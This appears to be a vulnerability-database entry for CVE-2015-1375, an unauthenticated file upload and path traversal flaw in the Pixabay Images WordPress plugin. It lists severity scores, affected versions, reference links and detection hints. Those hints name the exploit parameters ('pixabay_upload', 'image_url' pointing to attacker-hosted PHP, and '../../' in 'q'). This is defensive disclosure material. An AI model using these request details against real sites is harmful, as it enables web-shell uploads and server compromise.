CVE-2015-1375
published 2015-01-28CVE-2015-1375: pixabay-images.php in the Pixabay Images plugin before 2.4 for WordPress does not properly restrict access to the upload functionality, which allows remote…
PriorityP264high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
12.25%
95.7th percentile
pixabay-images.php in the Pixabay Images plugin before 2.4 for WordPress does not properly restrict access to the upload functionality, which allows remote attackers to write to arbitrary files.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pixabay_images_project | pixabay_images | <= 2.3 | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Look for unauthenticated POST requests to /wp-admin/ containing the parameter 'pixabay_upload=1', which indicates exploitation of the authentication bypass combined with arbitrary file upload. ↗
- →Detect path traversal attempts via the 'q' POST parameter containing sequences such as '../../' targeting the Pixabay Images plugin upload functionality. ↗
- →Monitor for POST requests with Content-Type 'application/x-www-form-urlencoded' to /wp-admin/ containing both 'pixabay_upload' and 'image_url' parameters, especially where image_url points to an external or attacker-controlled host serving PHP files. ↗
- →The plugin does not validate the host in the provided download URL; alert on 'image_url' values referencing non-Pixabay domains, particularly those ending in .php. ↗
- ·The authentication bypass means exploitation requires NO valid WordPress credentials; any unauthenticated remote attacker can trigger the upload endpoint. ↗
- ·Path traversal via the 'q' parameter allows files to be written outside the intended 'download' folder, meaning uploaded shells may land anywhere on the filesystem accessible to the web server. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/130017/WordPress-Pixarbay-Images-2.3-XSS-Bypass-Upload-Traversal.htmlhttp://seclists.org/fulldisclosure/2015/Jan/75http://www.exploit-db.com/exploits/35846http://www.openwall.com/lists/oss-security/2015/01/25/5http://www.osvdb.org/117146http://www.securityfocus.com/archive/1/534505/100/0/threadedhttps://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=1067992%40pixabay-images%2Ftrunk%2Fpixabay-images.php&old=926633%40pixabay-images%2Ftrunk%2Fpixabay-images.phphttp://packetstormsecurity.com/files/130017/WordPress-Pixarbay-Images-2.3-XSS-Bypass-Upload-Traversal.htmlhttp://seclists.org/fulldisclosure/2015/Jan/75http://www.exploit-db.com/exploits/35846http://www.openwall.com/lists/oss-security/2015/01/25/5http://www.osvdb.org/117146http://www.securityfocus.com/archive/1/534505/100/0/threadedhttps://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=1067992%40pixabay-images%2Ftrunk%2Fpixabay-images.php&old=926633%40pixabay-images%2Ftrunk%2Fpixabay-images.php
2015-01-28
Published